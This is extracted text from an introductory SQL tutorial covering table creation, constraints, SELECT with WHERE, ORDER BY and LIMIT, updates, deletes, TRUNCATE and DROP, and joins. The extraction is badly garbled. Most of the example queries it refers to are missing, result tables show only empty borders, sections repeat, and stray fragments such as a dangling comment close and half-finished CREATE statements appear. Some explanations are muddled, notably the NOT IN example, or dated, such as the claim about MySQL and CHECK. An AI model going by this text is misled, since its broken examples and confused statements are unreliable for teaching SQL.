SQL Statements
SQL Statements
Part 1: Overview
SQL Statements
SQL statements are very simple and straightforward like plain English but with specific syntax.
An SQL statement is composed of a sequence of keywords, identifiers, etc. terminated by a semicolon (;).
Here is an example of a valid SQL statement.
Use semicolon at the end of an SQL statement — it terminates the statement or submits the statement to
the database server. Some database management system has, however, no such requirement, but it is
considered as a best practice to use it.
SQL keywords are case-insensitive that means SELECT is same as select. But, the database and table
names may case-sensitive depending on the operating system. In general, Unix or Linux platforms are
case-sensitive, whereas Windows platforms aren't.
SQL Comments
A comment is simply a text that is ignored by the database engine. Comments can be used to provide a
quick hint about the SQL statement.
SQL support single-line, as well as multi-line comments. To write a single-line comment start the line with
two consecutive hyphens (--).For example:
However to write multi-line comments, start the comment with a slash followed by an asterisk (/*) and end
the comment with an asterisk followed by a slash (*/), like this:
Part 2: Database Commands
Creating a Database
CREATE DATABASE database_name;
Creating a database does not select it for use. So, before moving further we must need to select the
target database with the USE statement. For example, the USE demo; command sets the demo database
as target database for all future commands.
SQL CREATE TABLE Statement
....
);
birth_date DATE,
);
The data type of the columns may vary depending on the database system. For example, MySQL and
SQL Server supports INT data type for integer values, whereas the Oracle database
supports NUMBER data type.
The following table summarizes the most commonly used data types supported by MySQL.
TIMESTAM Stores timestamp values. TIMESTAMP values are stored as the number of seconds since
P the Unix epoch ('1970-01-01 00:00:01' UTC).
There are a few additional constraints (also called modifiers) that are set for the table columns in the
preceding statement. Constraints define rules regarding the values allowed in columns.
The PRIMARY KEY constraint marks the corresponding field as the table's primary key.
The UNIQUE constraint ensures that each row for a column must have a unique value.
Note: The Microsoft SQL Server uses the IDENTITY property to perform an auto-increment feature. The
default value is IDENTITY(1,1) which means the seed or starting value is 1, and the incremental value is
also 1.
You can execute the command DESC table_name; to see the column information or structure of any table
in MySQL and Oracle database, whereas EXEC sp_columns table_name; in SQL Server (replace
the table_name with actual table name).
If you try to create a table that is already exists inside the database you'll get an error message. To avoid
this in MySQL you can use an optional clause IF NOT EXISTS as follow:
CREATE TABLE IF NOT EXISTS persons ( id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
name VARCHAR(50) NOT NULL, birth_date DATE, phone VARCHAR(15) NOT NULL UNIQUE );
If you want to see the list of tables inside the currently selected database, you can execute SHOW
TABLES; statement on the MySQL command line.
What is Constraint?
A constraint is simply a restriction placed on one or more columns of a table to limit the type of values that
can be stored in that column. Constraints provide a standard mechanism to maintain the accuracy and
integrity of the data inside a database table.
NOT NULL
PRIMARY KEY
UNIQUE
DEFAULT
FOREIGN KEY
CHECK
This means if NOT NULL constraint is applied on a column then you cannot insert a new row in the table
without adding a non-NULL value for that column.
The following SQL statement creates a table named persons with four columns, out of which three
columns, id, name and phone do not accept NULL values.
CREATE TABLE persons ( id INT NOT NULL, name VARCHAR(30) NOT NULL, birth_date DATE, phone
VARCHAR(15) NOT NULL );
A null value or NULL is different from zero (0), blank, or a zero-length character string such
as ''. NULL means that no entry has been made.
The PRIMARY KEY constraint identify the column or set of columns that have values that uniquely
identify a row in a table. No two rows in a table can have the same primary key value. Also, you cannot
enter NULL value in a primary key column.
The following SQL statement creates a table named persons and specifies the id column as the primary
key. That means this field does not allow NULL or duplicate values.
CREATE TABLE persons ( id INT NOT NULL PRIMARY KEY, name VARCHAR(30) NOT NULL,
birth_date DATE, phone VARCHAR(15) NOT NULL );
The primary key typically consists of one column in a table, however more than one column can comprise
the primary key, e.g. either the employee's email address or assigned identification number is the logical
primary key for an employee table.
UNIQUE Constraint
The UNIQUE constraint restricts one or more columns to contain unique values within a table.
The following SQL statement creates a table named persons and specifies the phone column as unique.
That means this field does not allow duplicate values.
CREATE TABLE persons ( id INT NOT NULL PRIMARY KEY, name VARCHAR(30) NOT NULL,
birth_date DATE, phone VARCHAR(15) NOT NULL UNIQUE );
A column default is some value that will be inserted in the column by the database engine when
an INSERT statement doesn't explicitly assign a particular value.
CREATE TABLE persons ( id INT NOT NULL PRIMARY KEY, name VARCHAR(30) NOT NULL,
birth_date DATE, phone VARCHAR(15) NOT NULL UNIQUE, country VARCHAR(30) NOT NULL
DEFAULT 'Australia' );
If you define a table column as NOT NULL, but assign the column a default value, then in
the INSERT statement you don't need to explicitly assign a value for that column in order to insert a new
row in the table.
A foreign key (FK) is a column or combination of columns that is used to establish and enforce a
relationship between the data in two tables.
In MySQL you can create a foreign key by defining a FOREIGN KEY constraint when you create a table
as follow. The following statement establishes a foreign key on the dept_id column of the employees table
that references the dept_id column of the departments table.
CREATE TABLE employees ( emp_id INT NOT NULL PRIMARY KEY, emp_name VARCHAR(55) NOT
NULL, hire_date DATE NOT NULL, salary INT, dept_id INT, FOREIGN KEY (dept_id) REFERENCES
departments(dept_id) );
CHECK Constraint
For example, the range of values for a salary column can be limited by creating a CHECK constraint that
allows values only from 3,000 to 10,000. This prevents salaries from being entered beyond the regular
salary range. Here's an example:
CREATE TABLE employees ( emp_id INT NOT NULL PRIMARY KEY, emp_name VARCHAR(55) NOT
NULL, hire_date DATE NOT NULL, salary INT NOT NULL CHECK (salary >= 3000 AND salary <=
10000), dept_id INT, FOREIGN KEY (dept_id) REFERENCES departments(dept_id) );
Note: MySQL does not support SQL check constraint. The CHECK clause is parsed however but ignored
by all storage engines of the MySQL.
Now it's time to insert some data inside our newly created database table.
Syntax
The basic syntax for inserting data into a table can be given with:
INSERT INTO table_name (column1,column2,...) VALUES (value1,value2,...);
Here the column1, column2,..., etc. represents the name of the table columns, whereas
the value1, value2,..., and so on represents the corresponding values for these columns.
Did you notice, we didn't insert any value for id field? Because, if you remember from the create
table chapter, the id field was marked with AUTO_INCREMENT flag, which tells MySQL to automatically
assign a value to this field if it is left unspecified.
Non-numeric values like strings and dates must always be surrounded by quotes, whereas numeric
values should never be enclosed within quotes. Also, if your string itself contains quotes you should
escape it with backslash like 'Let\'s go'.
INSERT INTO persons (name, birth_date, phone) VALUES ('Carrie Simpson', '1995-05-01', '0251-
031259');
INSERT INTO persons (name, birth_date, phone) VALUES ('Victoria Ashworth', '1996-10-17', '0695-
346721');
Now if you select the records from persons table, the output will now look like this:
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
INSERT INTO persons (name, birth_date, phone) VALUES ('Carrie Simpson', '1995-05-01', '0251-
031259');
INSERT INTO persons (name, birth_date, phone) VALUES ('Victoria Ashworth', '1996-10-17', '0695-
346721');
SQL SELECT Statement
In the previous chapter we've learned how to insert data in a database table. Now it's time to select the
data from existing tables using the SQL query.
The SELECT statement is used to select or retrieve the data from one or more tables. You can use this
statement to retrieve all the rows from a table in one go, as well as to retrieve only those rows that satisfy
a certain condition or a combination of conditions.
The basic syntax for selecting the data from a table can be given with:
SELECT column1_name, column2_name, columnN_name FROM table_name;
Here, column1_name, column2_name, ... are the names of the columns or fields of a database table
whose values you want to fetch. However, if you want to fetch the values of all the columns available in a
table, you can just use the following syntax:
SELECT * FROM table_name;
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following statement will return all the rows from the employees table.
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
As you can see, it returns all the rows and columns from the employees table.
Tip: The asterisk (*) is a wildcard character that means everything. For example, the asterisk character in
the SELECT statement of the example above is a shorthand substitute for all the columns of
the employees table.
Select Columns from Table
If you don't require all the data, you can select specific columns, like this:
After executing the above statement, you'll get the output something like this:
+--------+--------------+------------+--------+
+--------+--------------+------------+--------+
+--------+--------------+------------+--------+
As you can see this time there is no dept_id column in the result set. In the next chapter we'll learn how to
select the records from a table based on a condition.
SQL WHERE Clause
The WHERE clause is used with the SELECT, UPDATE, and DELETE. However, you'll see the use of
this clause with other statements in upcoming parts.
Syntax
The WHERE clause is used with the SELECT statement to extract only those records that fulfill specified
conditions. The basic syntax can be given with:
SELECT column_list FROM table_name WHERE condition;
SELECT * FROM table_name WHERE condition;
Now, let's check out some examples that demonstrate how it actually works.
Suppose we've a table called employees in our database with the following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following SQL statement will returns all the employees from the employees table, whose salary is
greater than 7000. The WHERE clause simply filtered out the unwanted data.
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
As you can see the output contains only those employees whose salary is greater than 7000. Similarly,
you can fetch records from specific columns, like this:
SELECT emp_id, emp_name, hire_date, salary FROM employees WHERE salary > 7000;
After executing the above statement, you'll get the output something like this:
+--------+--------------+------------+--------+
+--------+--------------+------------+--------+
+--------+--------------+------------+--------+
The following statement will fetch the records of an employee whose employee id is 2.
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
This time we got only one row in the output, because emp_id is unique for every employee.
Operators Allowed in WHERE Clause
SQL supports a number of different operators that can be used in WHERE clause, the most important
ones are summarized in the following table.
= Equal WHERE id = 2
IN Check whether a specified value matches any value WHERE country IN ('USA', 'UK')
in a list or subquery
BETWEE Check whether a specified value is within a range of WHERE rating BETWEEN 3 AND 5
N values
AND OR Operators
In the previous chapter we've learned how to fetch records from a table using a single condition with
the WHERE clause. But sometimes you need to filter records based on multiple conditions like selecting
users whose ages are greater than 30 and country is United States, selecting products whose price is
lower than 100 dollar and ratings is greater than 4, etc.
The AND Operator
The AND operator is a logical operator that combines two conditions and returns TRUE only if both
condition evaluate to TRUE . The AND operator is often used in the WHERE clause of
the SELECT, UPDATE, DELETE statement to form conditions to filter the result set.
SELECT column1_name, column2_name, columnN_name
FROM table_name
Let's check out some examples that demonstrate how it actually works.
Suppose we've a table called employees in our database with the following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Using WHERE Clause with AND Operator
The following SQL statement will return only those employees from the employees table whose salary is
greater than 7000 and the dept_id is equal to 5.
Example
After execution, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The OR Operator
Similarly, the OR operator is also a logical operator that combines two conditions, but it
returns TRUE when either of the conditions is TRUE.
The following SQL statement will return all the employees from the employees table whose salary is
either greater than 7000 or the dept_id is equal to 5.
Example
This time you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Combining AND & OR Operator
The following SQL statement will return all the employees whose salary is greater than 5000 and
the dept_id is either equal to 1 or 5.
Example
After executing the above query, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Default Example
birth_date DATE,
);
birth_date DATE,
);
salary INT,
);
Conclusion
Values
(dept_id, dept_name)
VALUES
('321', 'util_1'),
('421','util_2'),
('521','util_3'),
('621','util_4');
*/
Select tables
SELECT
FROM employees
Where Clause INTRO
UPDATE dbo.employees
or
UPDATE employees
END
SELECT emp_id, emp_name, hire_date, salary FROM employees WHERE salary < 4000
Multiple CONDITIONS
FROM table_name
The AND operator is a logical operator that combines two conditions and returns TRUE only if both
condition evaluate to TRUE . The AND operator is often used in the WHERE clause of the SELECT,
UPDATE, DELETE statement to form conditions to filter the result set.
FROM table_name
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Using WHERE Clause with AND Operator
The following SQL statement will return only those employees from the employees table whose salary is
greater than 7000 and the dept_id is equal to 5.
After execution, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The OR Operator
Similarly, the OR operator is also a logical operator that combines two conditions, but it returns TRUE
when either of the conditions is TRUE.
The following SQL statement will return all the employees from the employees table whose salary is
either greater than 7000 or the dept_id is equal to 5.
This time you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Combining AND & OR Operator
You can also combine AND and OR to create complex conditional expressions.
The following SQL statement will return all the employees whose salary is greater than 5000 and the
dept_id is either equal to 1 or 5.
After executing the above query, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Range and Membership Conditions
If you have to check the values that lie within a range or set of values, And here the IN and BETWEEN
operators comes in picture that lets you define an exclusive range or a set of values rather than
combining the separate conditions.
The IN Operator
The IN operator is logical operator that is used to check whether a particular value exists within a set of
values or not. Its basic syntax can be given with:
Here, column_list are the names of columns/fields like name, age, country etc. of a database table whose
values you want to fetch. Well, let's check out some examples.
Consider we've an employees table in our database that has following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following SQL statement will return only those employees whose dept_id is either 1 or 3.
After executing the query, you will get the result set something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Similarly, you can use the NOT IN operator, which is exact opposite of the IN. The following SQL
statement will return all the employees except those whose dept_id is not 1 or 3.
After executing the query, this time you will get the result set something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The BETWEEN Operator
Sometimes you want to select a row if the value in a column falls within a certain range. This type of
condition is common when working with numeric data.
To perform the query based on such condition you can utilize the BETWEEN operator. It is a logical
operator that allows you to specify a range to test, as follow:
FROM table_name
The following SQL statement will return only those employees from the employees table, whose salary
falls within the range of 7000 and 9000.
After execution, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
When using the BETWEEN operator with date or time values, use the CAST() function to explicitly
convert the values to the desired data type for best results. For example, if you use a string such as
'2016-12-31' in a comparison to a DATE, cast the string to a DATE, as follow:
The following SQL statement selects all the employees who hired between 1st January 2006 (i.e. '2006-
01-01') and 31st December 2016 (i.e. '2016-12-31'):
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
While ranges of dates and numbers are most common, you can also build conditions that search for
ranges of strings. The following SQL statement selects all the employees whose name beginning with any
of the letter between 'O' and 'Z':
After execution, you will get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
SQL ORDER BY Clause
Generally when you use the SELECT statement to fetch data from a table, the rows in result set are not in
any particular order. If you want your result set in a particular order, you can specify the ORDER BY
clause at the end of the statement which tells the server how to sort the data returned by the query. The
default sorting order is ascending.
Syntax
The ORDER BY clause is used to sort the data returned by a query in ascending or descending order.
The basic syntax of this clause can be given with:
Here, column_list are the names of columns/fields like name, age, country etc. of a database table whose
values you want to fetch, whereas the column_name is name of the column you want to sort. Let's check
out some examples that demonstrate how it actually works.
Consider we've an employees table in our database that has following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
You can skip the ASC option and simply use the following syntax. It returns the same result set as
previous statement, because the default sorting order is ascending:
ORDER BY emp_name;
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
Similarly, you can use the DESC option to perform a sorting in descending order. The following statement
will orders the result set by the numeric salary column in descending order.
SELECT * FROM employees
This time, you'll get the result set something like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
You can also specify multiple columns while sorting. However, the change in result set will not visible until
you've some duplicate values in your table. Well, let's find out:
To understand the multi-column sorting in a better way, let's assume that we've a table named trainees in
our database with the following records:
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
If you see the table carefully, you'll find that we've some duplicate values. However, the full name of the
trainee "Peter Parker" and "Peter Pan" are different but their first names are same.
Now execute the following command which orders the result set by the first_name column.
ORDER BY first_name;
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
Now execute this statement which orders the result set by first_name and last_name columns.
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
+----+------------+------------+-------------+--------+
To handle such situations, you can use SQL's TOP clause in your SELECT statement. However the TOP
clause is only supported by the SQL Server and MS Access database systems.
MySQL provides an equivalent LIMIT clause, whereas Oracle provides ROWNUM clause for the SELECT
statement to restrict the number of rows returned by a query.
The SQL TOP clause is used to limit the number of rows returned. Its basic syntax is:
Here, column_list is a comma separated list of column or field names of a database table (e.g. name,
age, country, etc.) whose values you want to fetch. Let's see how it works.
Suppose we've an employees table in our database with the following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following statement returns top three highest-paid employees from the employees table.
-- Syntax for SQL Server Database
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
You can optionally use the PERCENT keyword after the fixed value in a TOP clause, if you just want to
retrieve the percentage of rows instead of fixed number of rows. Fractional values are rounded up to the
next integer value (e.g. 1.5 rounded to 2).
The result set returned by the above query will look like this:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following statement returns top three highest-paid employees from the employees table.
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
When two parameters are specified, the first parameter specifies the offset of the first row to return i.e. the
starting point, whereas the second parameter specifies the maximum number of rows to return. The offset
of the initial row is 0 (not 1).
So, if you want to find out the third-highest paid employee, you can do the following:
After executing the above command, you'll get only one record in your result set:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
When fetching data from a database table, the result set may contain duplicate rows or values. If you
want to remove these duplicate values you can specify the keyword DISTINCT directly after the SELECT
keyword, as demonstrated below:
Syntax
The DISTINCT clause is used to remove duplicate rows from the result set:
Here, column_list is a comma separated list of column or field names of a database table (e.g. name,
age, country, etc.) whose values you want to fetch.
Let's check out some examples that demonstrate how it actually works.
Suppose we've a customers table in our database with the following records:
+---------+--------------------+-----------+-------------+
+---------+--------------------+-----------+-------------+
+---------+--------------------+-----------+-------------+
Now execute the following statement which returns all the rows from the city column of this table.
SELECT city FROM customers;
+-----------+
| city |
+-----------+
| Berlin |
| Madrid |
| Paris |
| Turin |
| Portland |
| Madrid |
+-----------+
If you see the output carefully, you'll find the city "Madrid" appears two times in our result set, which is not
good. Well, let's fix this problem.
After executing the above command, you'll get the output something like this:
+-----------+
| city |
+-----------+
| Berlin |
| Madrid |
| Paris |
| Turin |
| Portland |
+-----------+
As you see this time there is no duplicate values in our result set.
Syntax
UPDATE table_name
WHERE condition;
Here, column1_name, column2_name,...are the names of the columns or fields of a database table
whose values you want to update. You can also combine multiple conditions using the AND or OR
operators, that you've learned in the previous chapters.
The WHERE clause in the UPDATE statement specifies which record or records should be updated. If
you omit the WHERE clause, all the records will be updated.
Let's check out some examples that demonstrate how it actually works.
Suppose we've an employees table in our database that has following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
WHERE emp_id = 3;
After execution, the resulting table will look something like this:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
UPDATE employees
WHERE emp_id = 5;
After execution, the resulting table will look something like this:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
Just as you insert records into a table with the INSERT statement, you can delete records from a table as
well with the DELETE statement.
Syntax
The DELETE statement is used to remove one or more rows from a table.
Warning: The WHERE clause in the DELETE statement specifies which record or records should be
deleted. It is however optional, but if you omit or forget the WHERE clause, all the records will be deleted
permanently from the table.
Let's delete some records from the persons table that we've created in create table chapter.
Suppose that our persons table currently has the following records:
Suppose that our persons table currently has the following records:
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
After executing the query, the persons table will look something like this:
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
+----+--------------------+------------+-------------+
Similarly, as mentioned above if you do not specify the WHERE clause in the DELETE statement all the
rows from the table will be deleted. However, the target table itself won't be deleted that means the table
structure, attributes, and indexes will remain intact.
The following statement will remove all the records from the persons table:
The TRUNCATE TABLE statement removes all the rows from a table more quickly than a DELETE.
Logically, TRUNCATE TABLE is similar to the DELETE statement with no WHERE clause.
The TRUNCATE TABLE statement removes all the rows from a table, but the table structure and its
columns, constraints, indexes, and so on remain intact. To remove the table definition in addition to its
data, you can use the DROP TABLE statement.
Syntax
Consider we've an employees table in our database with the following records:
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
+--------+--------------+------------+--------+---------+
The following command removes all the rows from the employees table:
Now, after executing the above SQL statement, if you try to select the records from the employees table,
you will get an empty result set.
TRUNCATE TABLE statement drop and re-create the table in such a way that any
auto-increment value is reset to its start value which is generally 1.
DELETE lets you filter which rows to be deleted based upon an optional WHERE clause, whereas
TRUNCATE TABLE doesn't support WHERE clause it just removes all the rows.
TRUNCATE TABLE is faster and uses fewer system resources than DELETE, because DELETE scans
the table to generate a count of rows that were affected then delete the rows one by one and records an
entry in the database log for each deleted row, while TRUNCATE TABLE just delete all the rows without
providing any additional information.
Note: Use TRUNCATE TABLE if you just want to delete all the rows and re-create the whole table. Use
DELETE either if you want to delete limited number of rows based on specific condition or you don't want
to reset the auto-increment value.
You can use the DROP TABLE statement to easily delete the database tables that you no longer need.
The DROP TABLE statement permanently erase all data from the table, as well as the metadata that
defines the table in the data dictionary.
Syntax
The DROP TABLE removes one or more tables. The syntax can be given with:
Here, table1_name, table2_name, ... are the names of the tables that you want to delete.
Note: Dropping a database or table is irreversible. So, be careful while using the DROP statement,
because database system generally do not display any alert like "Are you sure?". It will immediately
delete the database or table and all of its data.
Let's try to remove a database table using the DROP TABLE statement.
If you remember back to create table chapter, we've created a table persons in our demo database. The
following statement will remove this table permanently from the database.
After executing the above command, if you try to perform any operation on the persons table, like
selecting the records from it, you'll get an error message.
Removing Database
Similarly, you can delete a database using the DROP DATABASE statement. The following command will
permanently remove the demo database from the database server.
Now if you try to select the demo database using the USE demo; statement, you'll get an error message
saying "Unknown database" or "Database does not exist".
Part 3: Joins
To understand this easily, let's look at the following employees and departments tables. Here, the dept_id
column of the employees table is the foreign key to the departments table. Therefore, these two tables
can be joined to get the combined data.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
In order to join tables, data of the columns which are used for joining tables should match, not necessarily
the column names.
When you join tables, the type of join that you create in your query affects the rows that appear in the
result set. You can create the following types of joins:
Inner Join
A join that returns only those rows that have a match in both joined tables. For example, you can join the
employees and departments tables to create a result set that shows the department name for each
employee. In an inner join, employees for which there is no department information are not included in the
result set, nor are departments with no employees.
The INNER JOIN is the most common type of join. It returns only those rows that have a match in both
joined tables. The following Venn diagram illustrates how inner join works.
To understand this easily, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say you need to retrieve the id, name, hire date, and the department name of only those
employees who assigned to a particular department. Because, in real-life scenario there may be some
employees who are not yet assigned to a department, like the fifth employee "Martin Blank" in our
employees table. But the question here is, how to retrieve the data from both the tables in the same SQL
query?
If you see the employees table, you'll notice that it has a column named dept_id which holds the ID of the
department to which each employee is assigned i.e. in technical terms, the employees table's dept_id
column is the foreign key to the departments table, and therefore we will use this column as a bridge
between these two tables.
Here's an example that retrieves the employee's id, name, hiring date and their department by joining the
employees and departments tables together using the common dept_id column. It excludes those
employees who are not assigned to any department.
SELECT
ON t1.dept_id = t2.dept_id
ORDER BY emp_id;
Note: When joining tables, prefix each column name with the name of the table it belongs to (e.g.
employees.dept_id, departments.dept_id, or t1.dept_id, t2.dept_id if you're using the table aliases) in
order to avoid confusion and ambiguous column error in case columns in different tables have the same
name.
To save time, in place of typing the long table names you can use table aliases in the query. For example,
you can give the employees table an alias name t1 and refer its column emp_name using t1.emp_name
instead of employees.emp_name
After executing the above command, you get the result set something like this:
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
As you can see, the result set contains only those employees for which the dept_id value is present and
that value also exists in the dept_id column of the departments table.
Outer join
Outer joins are an extension to inner joins. An outer join returns the rows even if they don't have related
rows in the joined table. There are three types of outer joins: left outer join (or left join), right outer join (or
right join), and full outer join (or full join).
A LEFT JOIN statement returns all rows from the left table along with the rows from the right table for
which the join condition is met. Left join is a type of outer join that's why it is also referred as left outer
join. Other variations of outer join are right join and full join.
Note: An outer join is a join that includes rows in a result set even though there may not be a match
between rows in the two tables being joined.
To understand this clearly, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say you want to retrieve the id, name and hire date of all the employees along with the name of
their department, irrespective of whether they are assigned to any department or not. To get such type of
result set we need to apply a left join.
The following statement retrieves employee's id, name, hiring date and their department name by joining
the employees and departments tables together using the common dept_id field. It also includes those
employees who are not assigned to a department.
In a join query, the left table is the one that appears leftmost in the JOIN clause, and the right table is the
one that appears rightmost.
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
As you can clearly see the left join includes all the rows from the employees table in the result set,
whether or not there is a match on the dept_id column in the departments table.
Note: If there is a row in the left table but no match in the right table, then the associated result row
contains NULL values for all columns coming from the right table.
The RIGHT JOIN is the exact opposite of the LEFT JOIN. It returns all rows from the right table along with
the rows from the left table for which the join condition is met.
Right join is a type of outer join that's why it is also referred as right outer join. Other variations of outer
join are left join and full join. The following Venn diagram illustrates how right join works.
Note: An outer join is a join that includes rows in a result set even though there may not be a match
between rows in the two tables being joined.
To understand this clearly, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say you want to retrieve the names of all departments as well as the details of employees
who're working in that department. But, in real situation there may be some department in which currently
no employee is working. Well, let's find out.
The following statement retrieves all the available departments as well as the id, name, hiring date of the
employees who belongs to that department by joining the employees and departments tables together
using the common dept_id field.
In a join query, the left table is the one that appears leftmost in the JOIN clause, and the right table is the
one that appears rightmost.
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
The right join includes all the rows from the departments table in the result set, whether or not there is a
match on the dept_id column in the employees table, as you can clearly see the department "Customer
Service" is included even if there is no employee in this department.
Note: If there is a row in the right table but no match in the left table, then the associated result row
contains NULL values for all columns coming from the left table.
Cross join
Cross joins are joins without a join condition. Each row of one table is combined with each row of another
table. This type of result set is called a Cartesian product or cross product. For example, a cross join
between the employees and departments tables yields a result set with one row for each possible
employees/departments combination.
A FULL JOIN returns all the rows from the joined tables, whether they are matched or not i.e. you can say
a full join combines the functions of a LEFT JOIN and a RIGHT JOIN. Full join is a type of outer join that's
why it is also referred as full outer join.
Note: An outer join is a join that includes rows in a result set even though there may not be a match
between rows in the two tables being joined.
To understand this clearly, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say you just want to retrieve the names of all the employees and the names of available
departments, regardless of whether they have corresponding rows in the other table, in that case you can
use a full join as demonstrated below.
The following statement retrieves all the departments as well as the details of all the employees by joining
the employees and departments tables together using the common dept_id field.
Some databases, such as Oracle, MySQL do not support full joins. In that case you can use the UNION
ALL operator to combine the LEFT JOIN and RIGHT JOIN as follows:
ON t1.dept_id = t2.dept_id
SQL CROSS JOIN Operation
If you don't specify a join condition when joining two tables, database system combines each row from the
first table with each row from the second table. This type of join is called a cross join or a Cartesian
product. The following Venn diagram illustrates how cross join works.
To understand this easily, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
The number of rows in a cross join is the product of the number of rows in each table. Here's a simple
example of a cross join operation.
Tip: A cross join creates a Cartesian product or multiplication of all rows in one table with all rows in
another. So, for example, if one table has 5 rows and another has 10 rows, a cross-join query produces
50 rows, the product of 5 and 10.
After executing the above command, you get the result set something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
As you can see a cross join is not as useful as the other joins that we've covered in the previous chapters.
Since the query didn't specify a join condition, each row from the employees table is combined with each
